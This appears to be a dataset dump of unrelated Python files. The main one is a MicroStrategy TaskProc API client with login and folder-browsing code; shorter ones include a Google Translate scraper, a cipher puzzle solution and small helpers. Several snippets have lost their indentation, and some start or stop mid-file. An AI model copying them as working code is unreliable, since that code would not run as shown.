                'AccountName' : self.cli_args.name, 'Password' : self.cli_args.password,
                'PasswordResetRequired' : passwordResetRequired})
headers = {'content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/plain'}
headers['Authorization'] = sign_request_v4('POST', '/', body, epoch_t, url_parse_result.netloc,
Config.service, Config.default_region);
headers['X-Amz-Date'] = get_timestamp(epoch_t);
if(self.cli_args.session_token is not None):
headers['X-Amz-Security-Token'] = self.cli_args.session_token;
if(headers['Authorization'] is None):
message = "Failed to generate v4 signature"
CLIResponse.send_error_out(message)
result = ConnMan.send_post_request(body, headers)
# Validate response
if(result['status'] == 200):
message = "Account login profile updated."
CLIResponse.send_success_out(message)
elif(result['status'] == 503):
message = "Failed to update Account login profile.\n" \
"An error occurred (503) when calling the UpdateAccountLoginProfile operation : " + result['reason']
CLIResponse.send_error_out(message)
else:
message = "Account login profile wasn't Updated."
error = ErrorResponse(result)
message += error.get_error_message()
CLIResponse.send_error_out(message)
| StarcoderdataPython |
174970 | <reponame>cgmark101/mark1-translate
import re, requests
agent = {
'User-Agent': "Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.1;SV1;.NET CLR 1.1.4322;.NET CLR 2.0.50727;.NET CLR 3.0.04506.30)"}
def translate(to_translate, to_language="auto", from_language="auto"):
base_link = f"http://translate.google.com/m?tl={to_language}&sl={from_language}&q={to_translate}"
request = requests.get(base_link, headers=agent)
expr = r'(?s)class="(?:t0|result-container)">(.*?)<'
re_result = re.findall(expr, request.text)
if (len(re_result) == 0):
result = ""
else:
result = re_result[0]
return (result)
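# Minimal usage sketch (needs network access to translate.google.com; the phrase and
# language codes below are arbitrary examples):
if __name__ == "__main__":
    print(translate("bonjour le monde", to_language="en", from_language="fr"))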
| StarcoderdataPython |
1731099 | <gh_stars>0
from .account import AccountView
from .meta import MetaView
from .structures import StructuresView
| StarcoderdataPython |
3381926 | <reponame>mwk0408/codewars_solutions
from functools import reduce
def nico(key, message):
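    """
    Nico/columnar transposition cipher (a summary of what the code below does):
    the message is written row by row into len(key) columns, the columns are
    reordered by the alphabetical order of the key's letters (short or empty
    columns are padded with a space), and the grid is read back row by row.
    """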
temp=[[] for i in range(len(key))]
for i in range(len(message)):
temp[i%len(key)].append(message[i])
maxlen=len(temp[0])
dict={}
for i in range(len(temp)):
dict[key[i]]=temp[i]
res=sorted(dict.items(), key=lambda x:(ord(x[0])))
for i in range(len(res)):
res[i]=list(res[i])
res[i].pop(0)
res[i]=reduce(lambda x : x, res[i])
if len(res[i])<maxlen:
res[i]+=[" "]
elif not res[i]:
res[i]=[" "]
string=""
for j in range(len(res[0])):
for i in range(len(res)):
string+=res[i][j]
return string | StarcoderdataPython |
1756932 | <gh_stars>1-10
_ = input()
a = set(input().split())
_=input()
b = set(input().split())
print(len(a.difference(b)))
| StarcoderdataPython |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import config
"""
This function prints a log message on the console along with the tag string.
@param log_type - Tag string ("ERROR", "TEST", "INFO").
@param log_msg - log message to print.
"""
def LOG ( log_type, log_msg ):
if log_type == "TEST":
print ("["+log_type+"] " + log_msg)
elif not config.TEST_MODE == True:
print ("["+log_type+"] log_parser: " + log_msg)
# End of file
| StarcoderdataPython |
3205889 | <gh_stars>0
__all__ = ['biobrain', 'utils']
| StarcoderdataPython |
1717299 | <gh_stars>1-10
from src.message_listener import MessageListener
from src.message_type import MessageType
class MessageSender:
def __init__(self):
self.message_listeners = []
def register_message_listener(self, message_listener: MessageListener):
self.message_listeners.append(message_listener)
def notify_all_message_listeners(self, message: str, message_type: MessageType):
for message_listener in self.message_listeners:
message_listener.notify(message, message_type)
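# Usage sketch (assumes a concrete MessageListener subclass; the listener body and the
# message_type value passed in are illustrative only):
#
#   class ConsoleListener(MessageListener):
#       def notify(self, message: str, message_type: MessageType):
#           print(message_type, message)
#
#   sender = MessageSender()
#   sender.register_message_listener(ConsoleListener())
#   sender.notify_all_message_listeners("job finished", message_type)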
| StarcoderdataPython |
1758354 | <filename>microstrategy_api/task_proc/task_proc.py<gh_stars>0
import re
import urllib.parse
import warnings
from enum import Enum
import time
from fnmatch import fnmatch
from typing import Optional, List, Set, Union
import requests
import logging
from bs4 import BeautifulSoup
from microstrategy_api.task_proc.document import Document
from microstrategy_api.task_proc.privilege_types import PrivilegeTypes, PrivilegeTypesIDDict
from microstrategy_api.task_proc.report import Report
from microstrategy_api.task_proc.attribute import Attribute
from microstrategy_api.task_proc.bit_set import BitSet
from microstrategy_api.task_proc.exceptions import MstrClientException
from microstrategy_api.task_proc.executable_base import ExecutableBase
from microstrategy_api.task_proc.object_type import ObjectType, ObjectTypeIDDict, ObjectSubTypeIDDict, ObjectSubType
BASE_PARAMS = {'taskEnv': 'xml', 'taskContentType': 'xml'}
class TaskProc(object):
"""
Class encapsulating base logic for the MicroStrategy Task Proc API
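    A minimal usage sketch (server, project and credentials are placeholders):
        task = TaskProc(base_url='https://host/MicroStrategy/asp/TaskProc.aspx',
                        server='ISERVER01', project_name='MyProject',
                        username='jdoe', password='...')
        reports = task.get_folder_contents('/Public Objects/Reports')
        task.logout()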
"""
def __init__(self,
base_url,
username=None,
                 password=None,
server=None,
project_source=None, # deprecated
project_name=None,
session_state=None,
concurrent_max=5,
max_retries=3,
retry_delay=2,
):
"""
Initialize the MstrClient by logging in and retrieving a session.
Arguments
----------
base_url (str):
base url of form http://hostname/MicroStrategy/asp/TaskProc.aspx
username (str):
username for project
password (str):
            password for project
server (str):
The machine name (or IP) of the MicroStrategy Intelligence Server to connect to.
project_name (str):
The name of the MicroStrategy project to connect to.
"""
self.log = logging.getLogger("{mod}.{cls}".format(mod=self.__class__.__module__, cls=self.__class__.__name__))
if 'TaskProc' in base_url:
if base_url[-1] != '?':
base_url += '?'
self._base_url = base_url
self.cookies = None
self.trace = False
self.retry_delay = retry_delay
self.max_retries = max_retries
self.concurrent_max = concurrent_max
self.server = server
self.project_name = project_name
self.username = username
self.password = password
self.__messages_to_retry_list = None
if session_state is None:
if project_source is not None:
warnings.warn('project_source parameter is deprecated, use server parameter instead')
if self.server is None:
self.server = project_source
else:
warnings.warn('both project_source deprecated param and server parameter provided!'
' server parameter value used')
else:
if self.server is None:
raise ValueError('Neither server nor project_source (deprecated) parameter provided!')
if self.username is not None:
self.login()
else:
self.login_guest()
else:
self._session = session_state
def __str__(self):
return 'MstrClient session: {}'.format(self._session)
@property
def _messages_to_retry(self):
if self.__messages_to_retry_list is None:
regex_list = \
[
'There are too many auditor handles at the moment. Please try again later.',
'There is possible deadlock. Please try to run the report later.',
'Failed to create job.',
'.* Number of jobs has exceeded maximum for project .*',
'Maximum number of executing jobs exceeded .*',
]
self.__messages_to_retry_list = [re.compile(pattern) for pattern in regex_list]
return self.__messages_to_retry_list
@property
def base_url(self):
return self._base_url
def login(self,
server: str=None,
project_name: str=None,
username: str=None,
password: str=None,
):
"""
Login to taskproc API
Arguments
----------
server (str):
The machine name (or IP) of the MicroStrategy Intelligence Server to connect to.
project_name (str):
The name of the MicroStrategy project to connect to.
username (str):
username for project
password (str):
password for project
"""
if server:
self.server = server
if project_name:
self.project_name = project_name
if username:
self.username = username
if password:
self.password = password
# getSessionState is used instead of login because we can set the rws parameter that way.
# arguments = {
# 'taskId': 'login',
# 'server': self.server,
# 'project': self.project_name,
# 'userid': self.username,
        #     'password': self.password
# }
arguments = {
'taskId': 'getSessionState',
'server': self.server,
'project': self.project_name,
'uid': self.username,
            'pwd': self.password,
'rws': self.concurrent_max,
}
self.log.debug("logging in.")
response = self.request(arguments)
if self.trace:
self.log.debug("logging in returned %s" % response)
# self._session_state = response.find('sessionState')
self._session = response.find('max-state').string
def login_guest(self,
server: str=None,
project_name: str=None,
):
"""
Login to taskproc API
Arguments
----------
server (str):
The machine name (or IP) of the MicroStrategy Intelligence Server to connect to.
project_name (str):
The name of the MicroStrategy project to connect to.
"""
if server:
self.server = server
if project_name:
self.project_name = project_name
arguments = {
'taskId': 'getSessionState',
'server': self.server,
'project': self.project_name,
'authMode': 8,
'rws': self.concurrent_max,
}
self.log.debug("logging in as guest")
response = self.request(arguments)
if self.trace:
self.log.debug("logging in returned %s" % response)
# self._session_state = response.find('sessionState')
self._session = response.find('max-state').string
@property
def session(self):
return self._session
class SystemFolders(Enum): # EnumDSSXMLFolderNames
"""
This interface defines the enumeration constants used to specify the folder names internally defined in MicroStrategy 7.
"""
PublicObjects = 1 # DssXmlFolderNamePublicObjects Specifies the folder "Public Objects".
PublicConsolidations = 2 # DssXmlFolderNamePublicConsolidations Specifies the folder "Consolidations" under the folder "Public Objects".
PublicCustomGroups = 3 # DssXmlFolderNamePublicCustomGroups Specifies the folder "Custom Groups" under the folder "Public Objects".
PublicFilters = 4 # DssXmlFolderNamePublicFilters Specifies the folder "Filters" under the folder "Public Objects".
PublicMetrics = 5 # DssXmlFolderNamePublicMetrics Specifies the folder "Metrics" under the folder "Public Objects".
PublicPrompts = 6 # DssXmlFolderNamePublicPrompts Specifies the folder "Prompts" under the folder "Public Objects".
PublicReports = 7 # DssXmlFolderNamePublicReports Specifies the folder "Reports" under the folder "Public Objects".
PublicSearches = 8 # DssXmlFolderNamePublicSearches Specifies the folder "Searches" under the folder "Public Objects".
PublicTemplates = 9 # DssXmlFolderNamePublicTemplates Specifies the folder "Templates" under the folder "Public Objects".
TemplateObjects = 10 # DssXmlFolderNameTemplateObjects Specifies the folder "Template Objects".
TemplateConsolidations = 11 # DssXmlFolderNameTemplateConsolidations Specifies the folder "Consolidations" under the folder "Template Objects".
TemplateCustomGroups = 12 # DssXmlFolderNameTemplateCustomGroups Specifies the folder "Custom Groups" under the folder "Template Objects".
TemplateFilters = 13 # DssXmlFolderNameTemplateFilters Specifies the folder "Filters" under the folder "Template Objects".
TemplateMetrics = 14 # DssXmlFolderNameTemplateMetrics Specifies the folder "Metrics" under the folder "Template Objects".
TemplatePrompts = 15 # DssXmlFolderNameTemplatePrompts Specifies the folder "Prompts" under the folder "Template Objects".
TemplateReports = 16 # DssXmlFolderNameTemplateReports Specifies the folder "Reports" under the folder "Template Objects".
TemplateSearches = 17 # DssXmlFolderNameTemplateSearches Specifies the folder "Searches" under the folder "Template Objects".
TemplateTemplates = 18 # DssXmlFolderNameTemplateTemplates Specifies the folder "Templates" under the folder "Template Objects".
ProfileObjects = 19 # DssXmlFolderNameProfileObjects Specifies the folder "Profile" of a user.
ProfileReports = 20 # DssXmlFolderNameProfileReports Specifies the folder "Reports" under the folder "Profile" of a user.
ProfileAnswers = 21 # DssXmlFolderNameProfileAnswers Specifies the folder "Answers" under the folder "Profile" of a user.
ProfileFavorites = 22 # DssXmlFolderNameProfileFavorites Specifies the folder "Favorites" under the folder "Profile" of a user.
ProfileOther = 23 # DssXmlFolderNameProfileOther Specifies the folder "Other" under the folder "Profile" of a user.
SchemaObjects = 24 # DssXmlFolderNameSchemaObjects Specifies the folder "Schema Objects".
SchemaAttributeForms = 25 # DssXmlFolderNameSchemaAttributeForms Specifies the folder "Attribute Forms" under the folder "Schema Objects".
SchemaAttributes = 26 # DssXmlFolderNameSchemaAttributes Specifies the folder "Attributes" under the folder "Schema Objects".
SchemaColumns = 27 # DssXmlFolderNameSchemaColumns Specifies the folder "Columns" under the folder "Schema Objects".
SchemaDataExplorer = 28 # DssXmlFolderNameSchemaDataExplorer Specifies the folder "Data Explorer" under the folder "Schema Objects".
SchemaFacts = 29 # DssXmlFolderNameSchemaFacts Specifies the folder "Facts" under the folder "Schema Objects".
SchemaFunctions = 30 # DssXmlFolderNameSchemaFunctions Specifies the folder "Functions" under the folder "Schema Objects".
SchemaHierarchies = 31 # DssXmlFolderNameSchemaHierarchies Specifies the folder "Hierarchies" under the folder "Schema Objects".
SchemaPartitionFilters = 32 # DssXmlFolderNameSchemaPartitionFilters Specifies the folder "Partition Filters" under the folder "Schema Objects".
SchemaPartitionMappings = 33 # DssXmlFolderNameSchemaPartitionMappings Specifies the folder "Partition Mappings" under the folder "Schema Objects".
SchemaSubtotals = 34 # DssXmlFolderNameSchemaSubtotals Specifies the folder"Subtotals" under the folder "Schema Objects".
SchemaTables = 35 # DssXmlFolderNameSchemaTables Specifies the folder "Tables" under the folder "Schema Objects".
SchemaWarehouseTables = 36 # DssXmlFolderNameSchemaWarehouseTables Specifies the folder "Warehouse Tables" under the folder "Schema Objects".
SchemaTransformationAttributes = 37 # DssXmlFolderNameSchemaTransformationAttributes Specifies the folder "Transformation Attributes" under the folder "Schema Objects".
SchemaTransformations = 38 # DssXmlFolderNameSchemaTransformations Specifies the folder "Transformations" under the folder "Schema Objects".
Root = 39 # DssXmlFolderNameRoot Specifies the root folder of the project.
SchemaFunctionsNested = 40 # DssXmlFolderNameSchemaFunctionsNested Specifies the "Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaBasicFunctions = 41 # DssXmlFolderNameSchemaBasicFunctions Specifies the "Basic Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaDateAndTimeFunctions = 42 # DssXmlFolderNameSchemaDateAndTimeFunctions Specifies the "Date and Time Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaInternalFunctions = 43 # DssXmlFolderNameSchemaInternalFunctions Specifies the "Internal Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaNullZeroFunctions = 44 # DssXmlFolderNameSchemaNullZeroFunctions Specifies the "Null/Zero Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaOlapFunctions = 45 # DssXmlFolderNameSchemaOlapFunctions Specifies the "OLAP Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaRankAndNTileFunctions = 46 # DssXmlFolderNameSchemaRankAndNTileFunctions Specifies the "Rank and NTile Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaStringFunctions = 47 # DssXmlFolderNameSchemaStringFunctions Specifies the "String Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaOperators = 48 # DssXmlFolderNameSchemaOperators Specifies the "Operators" folder nested several levels deep in the "Schema Objects" folder.
SchemaArithmeticOperators = 49 # DssXmlFolderNameSchemaArithmeticOperators Specifies the "Arithmetic Operators" folder nested several levels deep in the "Schema Objects" folder.
SchemaComparisonOperators = 50 # DssXmlFolderNameSchemaComparisonOperators Specifies the "Comparison Operators" folder nested several levels deep in the "Schema Objects" folder.
SchemaComparisonForRankOperators = 51 # DssXmlFolderNameSchemaComparisonForRankOperators Specifies the "Comparison Operators for Rank" folder nested several levels deep in the "Schema Objects" folder.
SchemaLogicalOperators = 52 # DssXmlFolderNameSchemaLogicalOperators Specifies the "Logical Operators" folder nested several levels deep in the "Schema Objects" folder.
SchemaPlugInPackages = 53 # DssXmlFolderNameSchemaPlugInPackages Specifies the "Plug-In Packages" folder nested several levels deep in the "Schema Objects" folder.
SchemaFinancialFunctions = 54 # DssXmlFolderNameSchemaFinancialFunctions Specifies the "Financial Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaMathFunctions = 55 # DssXmlFolderNameSchemaMathFunctions Specifies the "Math Functions" folder nested several levels deep in the "Schema Objects" folder.
SchemaStatisticalFunctions = 56 # DssXmlFolderNameSchemaStatisticalFunctions Specifies the "Statistical Functions" folder nested several levels deep in the "Schema Objects" folder.
AutoStyles = 57 # DssXmlFolderNameAutoStyles Specifies the "AutoStyles" folder in the "Public Objects" folder.
ConfigureMonitors = 58 # DssXmlFolderNameConfigureMonitors Specifies the "Monitors" folder in the Configuration.
ConfigureServerDefs = 59 # DssXmlFolderNameConfigureServerDefs Specifies the "Server Definitions" folder in the Configuration.
TemplateDocuments = 60 # DssXmlFolderNameTemplateDocuments Specifies the "Template Documents" folder.
SystemObjects = 61 # DssXmlFolderNameSystemObjects Specifies the "System Objects" folder.
SystemLinks = 62 # DssXmlFolderNameSystemLinks Specifies the "System Links" folder.
SystemPropertySets = 63 # DssXmlFolderNameSystemPropertySets Specifies the "System Property sets" folder.
SystemParserFolder = 64 # DssXmlFolderNameSystemParserFolder Specifies the "System Parser" folder.
SystemSchemaFolder = 65 # DssXmlFolderNameSystemSchemaFolder Specifies the "System Schema" folder.
SystemWarehouseCatalog = 66 # DssXmlFolderNameSystemWarehouseCatalog Specifies the "System Warehouse catalog" folder.
SystemSystemHierarchy = 67 # DssXmlFolderNameSystemSystemHierarchy Specifies the "System Hierarchy" folder.
SystemDrillMap = 68 # DssXmlFolderNameSystemDrillMap Specifies the "System Drill Map" folder.
SystemMDSecurityFilters = 69 # DssXmlFolderNameSystemMDSecurityFilters Specifies the "System MD Security Filters" folder.
SystemDummyPartitionTables = 70 # DssXmlFolderNameSystemDummyPartitionTables Specifies the "System Dummy Partition Tables" folder.
SystemSystemPrompts = 71 # DssXmlFolderNameSystemSystemPrompts Specifies the "System Prompts" folder.
Events = 72 # DssXmlFolderNameEvents None
ConfigureDBRoles = 73 # DssXmlFolderNameConfigureDBRoles None
Locales = 74 # DssXmlFolderNameLocales None
PropertySets = 75 # DssXmlFolderNamePropertySets Specifies the folder where Property Sets are stored
DBMS = 76 # DssXmlFolderNameDBMS None
Projects = 77 # DssXmlFolderNameProjects Specifies the folder where Projects are stored
Users = 78 # DssXmlFolderNameUsers Specifies the folder where Users are stored
UserGroups = 79 # DssXmlFolderNameUserGroups Specifies the folder where User Groups are stored
SecurityRoles = 80 # DssXmlFolderNameSecurityRoles Specifies the folder where Security Roles are stored
DBConnections = 81 # DssXmlFolderNameDBConnections None
DBLogins = 82 # DssXmlFolderNameDBLogins None
Links = 83 # DssXmlFolderNameLinks Specifies the folder where Links are stored
ScheduleObjects = 84 # DssXmlFolderNameScheduleObjects Specifies the folder where Schedules are stored
ScheduleTriggers = 85 # DssXmlFolderNameScheduleTriggers Specifies the folder where Schedule Triggers are stored
TableSources = 86 # DssXmlFolderNameTableSources None
VersionUpdateHistory = 87 # DssXmlFolderNameVersionUpdateHistory Specifies the folder where the Version Update History is stored
Devices = 88 # DssXmlFolderNameDevices Specifies the folder where Devices are stored
Transmitters = 89 # DssXmlFolderNameTransmitters Specifies the folder where Transmitters are stored
TemplateDashboards = 90 # DssXmlFolderNameTemplateDashboards Specifies the folder where Template Dashboards are stored
SystemDimension = 91 # DssXmlFolderNameSystemDimension Specifies the DSS ID of the system dimension object
ProfileSegments = 92 # DssXmlFolderNameProfileSegments None
TemplateAnalysis = 93 # DssXmlFolderNameTemplateAnalysis Specifies "Analysis" folder under "Template Objects"
Palettes = 94 # DssXmlFolderNamePalettes Palettes folder
Themes = 95 # DssXmlFolderNameThemes Themes folder
MyDossiers = 96 # DssXmlFolderNameMyDossiers Personal Dossiers folder
MySharedDossiers = 97 # DssXmlFolderNameMySharedDossiers Shared Dossiers folder
Maximum = 98 # DssXmlFolderNameMaximum Acts as a current maximum value. This should only be used as its symbolic name, not a hardcoded enumeration value, because it may change as more folder names are added.
BlackListed = 1000 # DssXmlFolderNameBlackListed Special value that will allow black listed folders to be treated uniquely
class FolderSortOrder(Enum):
# https://lw.microstrategy.com/msdz/MSDL/GARelease_Current/docs/ReferenceFiles/reference/com/microstrategy/web/objects/EnumWebObjectSort.html
ModificationTime = 7
NoSort = -1
ObjectDescription = 3
ObjectName = 2
ObjectNameFoldersFirst = 6
ObjectOwner = 4
ObjectType = 1
ObjectTypeDisplayOrder = 5
class FolderObject(object):
def __init__(self, guid, name, path, description, object_type, object_subtype):
self.guid = guid
self.name = name
self.path = path
self.description = description
self.contents = None
try:
object_type = int(object_type)
if object_type in ObjectTypeIDDict:
object_type = ObjectTypeIDDict[object_type]
except ValueError:
pass
self.object_type = object_type
try:
object_subtype = int(object_subtype)
if object_subtype in ObjectSubTypeIDDict:
object_subtype = ObjectSubTypeIDDict[object_subtype]
except ValueError:
pass
self.object_subtype = object_subtype
def path_str(self):
return '\\' + '\\'.join(self.path)
def full_name(self):
return self.path_str() + '\\' + self.name
def __str__(self) -> str:
return self.full_name()
def __repr__(self) -> str:
return "'{}'\t\t type={} subtype={} guid={}".format(self.full_name(),
self.object_type,
self.object_subtype, self.guid)
def get_folder_contents_by_guid(self,
folder_guid: str=None,
system_folder: Optional[SystemFolders]=None,
type_restriction: Optional[set]=None,
sort_key: Optional[FolderSortOrder]=None,
sort_ascending: Optional[bool]=True,
name_patterns_to_include: Optional[List[str]]=None,
name_patterns_to_exclude: Optional[List[str]]=None,
):
"""Returns a dictionary with folder name, GUID, and description.
Args
----
folder_guid:
guid of folder to list contents.
If not supplied, returns contents of system root folder as specified in system_folder
system_folder:
The numeric ID of the System Folder to inspect. Values correspond to the fields of the
EnumDSSXMLFolderNames interface. If omitted, then the Shared Reports folder ('7') is used.
type_restriction:
A set of the object SubTypes to include in the contents.
sort_key:
How the elements of the folder are sorted. Sort keys are specified as integers, as described
by the EnumWebObjectSort interface. If omitted, then WebObjectSortObjectNameFoldersFirst is used.
sort_ascending:
Sort the results in ascending order, if False, then descending order will be used.
name_patterns_to_include:
A list of file name patterns (using * wildcards) to include. Not case sensitive.
name_patterns_to_exclude:
A list of file name patterns (using * wildcards) to exclude. Not case sensitive.
Returns
-------
        list:
            list of TaskProc.FolderObject instances describing the folder contents
"""
if isinstance(name_patterns_to_include, str):
name_patterns_to_include = [name_patterns_to_include]
if isinstance(name_patterns_to_exclude, str):
name_patterns_to_exclude = [name_patterns_to_exclude]
arguments = {'sessionState': self._session,
'taskID': 'folderBrowse',
'includeObjectDesc': 'true',
'showObjectTags': 'true',
}
if folder_guid:
arguments['folderID'] = folder_guid
if system_folder:
if isinstance(system_folder, TaskProc.SystemFolders):
system_folder = system_folder.value
arguments['systemFolder'] = system_folder
if type_restriction is None:
# Note: Type 776 is added to the defaults to include cubes
type_restriction = '2048,768,769,774,776,14081'
elif not isinstance(type_restriction, str):
type_restriction_codes = set()
# noinspection PyTypeChecker
for type_restriction_val in type_restriction:
if isinstance(type_restriction_val, ObjectSubType):
type_restriction_codes.add(str(type_restriction_val.value))
else:
type_restriction_codes.add(str(type_restriction_val))
type_restriction = ','.join(type_restriction_codes)
arguments['typeRestriction'] = type_restriction
if sort_key:
arguments['sortKey'] = sort_key
if not sort_ascending:
arguments['asc'] = 'false'
try:
response = self.request(arguments)
except MstrClientException as e:
if 'The folder name is unknown to the server.' in e.msg:
raise FileNotFoundError("Folder ID {} not found".format(folder_guid))
else:
raise e
result = []
for folder in response('folders'):
path_list = list()
for seq_num, path_folder in enumerate(folder.path.find_all('folder')):
path_folder_name = path_folder.string
if seq_num == 0 and path_folder_name == 'Shared Reports':
path_list.append('Public Objects')
path_folder_name = 'Reports'
path_list.append(path_folder_name)
folder_name = folder.attrs['name']
if len(path_list) == 0 and folder_name == 'Shared Reports':
path_list.append('Public Objects')
folder_name = 'Reports'
path_list.append(folder_name)
for obj in folder('obj'):
name = obj.find('n').string
if name_patterns_to_include is None:
name_ok = True
else:
name_ok = False
for include_pattern in name_patterns_to_include:
if fnmatch(name.lower(), include_pattern.lower()):
name_ok = True
if name_patterns_to_exclude is not None:
for exclude_pattern in name_patterns_to_exclude:
if fnmatch(name.lower(), exclude_pattern.lower()):
name_ok = False
if name_ok:
obj_inst = TaskProc.FolderObject(
guid=obj.find('id').string,
name=name,
path=path_list,
description=obj.find('d').string,
object_type=obj.find('t').string,
object_subtype=obj.find('st').string,
)
result.append(obj_inst)
return result
@staticmethod
def path_parts(path) -> List[str]:
# MSTR Paths should use \ separators, however, if the paths starts with / we'll try and use that
if len(path) == 0:
return []
elif path[0] == '/':
return re.split('[/\\\]', path)
else:
return re.split('[\\\]', path)
def get_folder_contents_by_name(self,
name: Union[str, List[str]],
type_restriction: Optional[set] = None,
sort_key: Optional[FolderSortOrder] = None,
sort_ascending: Optional[bool] = True,
name_patterns_to_include: Optional[List[str]] = None,
name_patterns_to_exclude: Optional[List[str]] = None,
):
if isinstance(name, str):
name_parts = TaskProc.path_parts(name)
else:
# Blindly assume it's an iterable type
name_parts = name
if isinstance(type_restriction, str):
type_restriction = set(type_restriction.split(','))
folder_contents = []
intermediatefolder_type_restriction = {'2048'}
for folder_name in name_parts:
if folder_name == '':
pass
elif folder_name == 'Public Objects':
folder_contents = self.get_folder_contents_by_guid(system_folder=TaskProc.SystemFolders.PublicObjects,
type_restriction=intermediatefolder_type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
)
else:
found = False
new_folder_contents = None
for sub_folder in folder_contents:
if sub_folder.name == folder_name:
found = True
if sub_folder.object_type == ObjectType.Folder:
# If this is the last folder use the passed type_restriction and name patterns
if folder_name == name_parts[-1]:
new_folder_contents = self.get_folder_contents_by_guid(
folder_guid=sub_folder.guid,
type_restriction=type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
name_patterns_to_include=name_patterns_to_include,
name_patterns_to_exclude=name_patterns_to_exclude,
)
else:
new_folder_contents = self.get_folder_contents_by_guid(
folder_guid=sub_folder.guid,
type_restriction=intermediatefolder_type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
)
else:
new_folder_contents = sub_folder
if not found:
if isinstance(name, str):
msg = f'"{folder_name}" not found when processing path {name}\nParts={name_parts}'
else:
msg = f'"{folder_name}" not found when processing path {name}'
raise FileNotFoundError(msg)
else:
folder_contents = new_folder_contents
return folder_contents
def get_folder_contents(self,
name: Union[str, List[str]],
type_restriction: Optional[set] = None,
sort_key: Optional[FolderSortOrder] = None,
sort_ascending: Optional[bool] = True,
recursive: Optional[bool] = True,
flatten_structure: Optional[bool] = True,
name_patterns_to_include: Optional[List[str]] = None,
name_patterns_to_exclude: Optional[List[str]] = None,
) -> List[FolderObject]:
if type_restriction is not None:
sub_type_restriction = type_restriction.copy()
if recursive:
sub_type_restriction.add(ObjectSubType.Folder)
else:
sub_type_restriction = None
if isinstance(name, str) and len(name) == 32 and '/' not in name and '\\' not in name:
folder_contents = self.get_folder_contents_by_guid(folder_guid=name,
type_restriction=sub_type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
name_patterns_to_include=name_patterns_to_include,
name_patterns_to_exclude=name_patterns_to_exclude,
)
else:
folder_contents = self.get_folder_contents_by_name(name,
type_restriction=sub_type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
name_patterns_to_include=name_patterns_to_include,
name_patterns_to_exclude=name_patterns_to_exclude,
)
if recursive:
for item in folder_contents:
if item.object_type == ObjectType.Folder:
try:
contents = self.get_folder_contents(
name=item.guid,
type_restriction=type_restriction,
sort_key=sort_key,
sort_ascending=sort_ascending,
recursive=recursive,
flatten_structure=flatten_structure,
name_patterns_to_include=name_patterns_to_include,
name_patterns_to_exclude=name_patterns_to_exclude,
)
except FileNotFoundError as e:
contents = e
if flatten_structure:
if isinstance(contents, list):
folder_contents.extend(contents)
else:
item.contents = contents
if flatten_structure:
if type_restriction is not None:
folder_contents = [sub for sub in folder_contents if sub.object_subtype in type_restriction]
return folder_contents
def get_folder_object(self,
name: str,
type_restriction: Optional[set] = None,
) -> FolderObject:
name_parts = TaskProc.path_parts(name)
folder_name = '/'.join(name_parts[:-1])
object_name = name_parts[-1]
folder_contents = self.get_folder_contents(folder_name, type_restriction=type_restriction, name_patterns_to_include=[object_name])
if len(folder_contents) == 0:
raise FileNotFoundError("Folder {} does not contain {} (that matches type {})".format(
folder_name, object_name, type_restriction
))
elif len(folder_contents) > 1:
raise FileNotFoundError("Folder {} does contains multiple matches for {} (that match type {})\n {}".format(
folder_name, object_name, type_restriction, folder_contents,
))
else:
return folder_contents[0]
def get_matching_objects_list(self, path_list: list, type_restriction: set, error_list=None) -> List[FolderObject]:
"""
Get a list of matching FolderObjects based on a list of object name patterns.
Patterns accept wildcards:
- * for any set of characters. Allowed in the object name part of the path but not the folder name part.
- Patterns that end in [r] will match objects in any sub folder. Any non / characters immediately before
the [r] will be considered as an object name pattern to match in all sub folders.
Parameters
----------
path_list:
A list of path patterns
type_restriction:
A set of ObjectSubType values to allow.
error_list:
Option list to return path errors (FileNotFoundError) in. If not passed, then errors are raised.
Returns
-------
A list of matching FolderObject
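        Example
        -------
        A hypothetical call on a connected TaskProc instance `task` (folder names and
        patterns below are illustrative only)::
            matches = task.get_matching_objects_list(
                ['/Public Objects/Reports/Sales*',   # wildcard within one folder
                 '/Public Objects/Reports/[r]'],     # everything under Reports, recursively
                type_restriction={ObjectSubType.ReportWritingDocument},
            )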
"""
if isinstance(path_list, str):
path_list = [path_list]
result_list = list()
for path in path_list:
path = path.strip()
try:
if path == '':
pass
elif path[-3:].lower() == '[r]':
# Ends in [r] so recursive search is needed
path_parts = self.path_parts(path)
folder = path_parts[:-1]
file_name = path_parts[-1][:-3]
if file_name == '':
file_name_list = None
else:
file_name_list = [file_name]
contents = self.get_folder_contents(
name=folder,
name_patterns_to_include=file_name_list,
recursive=True,
flatten_structure=True,
type_restriction=type_restriction,
)
if len(contents) == 0:
msg = f"Path pattern {path} returned no matches"
if error_list is not None:
error_list.append(msg)
else:
self.log.warning(msg)
result_list.extend(contents)
else:
# Non recursive pass last part as name_patterns_to_include
path_parts = self.path_parts(path)
contents = self.get_folder_contents(
name=path_parts[:-1],
name_patterns_to_include=[path_parts[-1]],
recursive=False,
flatten_structure=True,
type_restriction=type_restriction,
)
if len(contents) == 0:
self.log.warning("Path pattern {} returned no matches".format(path))
result_list.extend(contents)
except FileNotFoundError as e:
if error_list is None:
raise e
else:
error_list.append(f'{path} yields {e}')
return result_list
def get_executable_object(self, folder_obj: FolderObject) -> ExecutableBase:
# Check based on object type
if folder_obj.object_subtype == ObjectSubType.ReportWritingDocument:
# Document
return Document(self, guid=folder_obj.guid, name=folder_obj.full_name())
elif folder_obj.object_subtype == ObjectSubType.ReportCube:
# Cube
return Report(self, guid=folder_obj.guid, name=folder_obj.full_name())
else:
# Regular report
return Report(self, guid=folder_obj.guid, name=folder_obj.full_name())
def list_elements(self, attribute_id):
"""
Returns the elements associated with the given attribute id.
Note that if the call fails (i.e. MicroStrategy returns an
